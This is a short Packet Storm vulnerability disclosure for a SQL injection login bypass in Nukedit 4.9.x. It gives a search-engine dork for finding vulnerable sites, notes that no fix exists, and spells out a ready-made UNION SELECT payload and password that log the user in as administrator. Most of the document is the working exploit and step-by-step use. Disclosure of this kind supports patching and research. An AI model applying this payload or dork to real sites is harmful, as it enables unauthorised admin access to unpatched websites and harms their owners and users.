Nukedit version 4.9.x suffers from a SQL injection vulnerability that allows for login bypass.
e06142c71fabd2c0062bc6350a17cd3924e26981a228e83adef65b44fa34f953#Title: Nukedit 4.9.x Login Bypass SQL injection
#
#Discovered By: r3dm0v3
# https://r3dm0v3.persianblog.ir
# r3dm0v3( 4t ) yahoo [dot] com
# Tehran - Iran
#
#Download: https://www.nukedit.com/content/Download.asp
#Vulnerables: 4.9.x, prior versions maybe vulnerable
#Remote: Yes
#Dork: "Powered by Nukedit"
# inurl:utilities/login.asp
#Fix: Not Available
#POC:
#goto https://target.com/[path_to_nukedit]/utilities/login.asp and fill login fields as below:
#Email: ' union select 1,1,'r3dm0v3',4,'ENCfc2aef9fe5f2c546429e2e1d9fd737e6da5b1b94707518619576129a915d0c2c',6,7,8,9,10,11,12,13,14,15,16,17,18,19,20 from tblusers where 'x'='x
#Password: r3dm0v3
#Click Login and you will get in as an admin.
#There some other sql injections in other pages.
© 2024 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed